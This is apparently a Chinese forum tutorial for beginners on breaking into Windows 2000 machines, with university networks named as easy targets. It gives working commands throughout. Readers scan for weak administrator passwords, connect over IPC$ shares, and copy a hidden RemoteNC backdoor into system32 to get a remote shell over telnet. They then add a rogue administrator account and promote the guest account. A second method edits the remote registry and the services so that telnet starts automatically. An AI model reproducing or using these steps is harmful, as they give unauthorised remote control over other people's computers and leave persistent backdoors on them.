最基础的WIN2K入侵(菜鸟看）

最基础的WIN2K入侵(菜鸟看）

最基础的WIN2K入侵(菜鸟看）最基础的WIN2K入侵(菜鸟看）
用扫描工具，找一个网段，尤其是高校的，你会发现，有很多弱口令，需要一个有admin权限的用户，好了，开始工作。
方法1：
运行里：[url=file:////ipaddress/c$]//ipaddress/c$[/url]
看看他的C盘里有什么东西，2K是不是安装在C，
准备一个REMOTENC.EXE
运行里：cmd.exe
在弹出的DOS窗口里：
net use [url=file:////ipaddress/ipc$]//ipaddress/ipc$[/url]
等待，会让你输入用户，密码，
OK，提示连接成功以后
copy c:/remotenc.exe [url=file:////ipaddress/admin$/system32]//ipaddress/admin$/system32[/url]
(隐藏好一点，不然一下子就发现了)
提示，一个文copyed,好了，接着：
c:/>RemoteNC ipaddress administrator password RunasUser "RemoteNC" "Provide ocal CMD Redirect" 7 123456
（这是启动remotnc）
ok ,现在可以telnet进去了
telnet ipaddress 7
等着输入密码了。
登陆以后：
net user hack 1234 /add
net localgroup administrators hack /add
net user guest /active:yes
net user guest 3214
net localgroup administrators guest /add
(加一个admin用户，提升guest的权限)
好了，一切在你的手中................别太黑，（除非他让你无法忍受）
方法2：
建立ipc连接
net use [url=file:////ipaddress/ipc$]//ipaddress/ipc$[/url]
运行：regedit
连接网络注册表
HKLM/SOFTWARE/MICROSOFT/TELNETSERVER/1.0
好啦，在右面找到NTLD，键值是2，改称1/0
推出
接着来，别着急
本机：控制面板－》管理工具—》计算机管理－》连接到另一台计算机；
等待，出现提示框：输入用户名，密码
ok 成功以后——
1－用户管理，添加系统用户
（有些主机禁止这项操作，就用方法1登陆上去，用指令添加）
2－看共享，把默认共享看看，有没有你感兴趣的东西
3－服务（这才是大头）
找到他的TELNET服务，右键属性，改称自动开启
（如果已经启动，必须重启，因为，毕竟，刚刚改过注册表吗～～）
好了，一切顺利，
开启DOS方式，直接TELNET吧～
它会问你什么信息，什么发送什么的，Y／N，你点Y，就好了。
进入主机了，别太..............就好了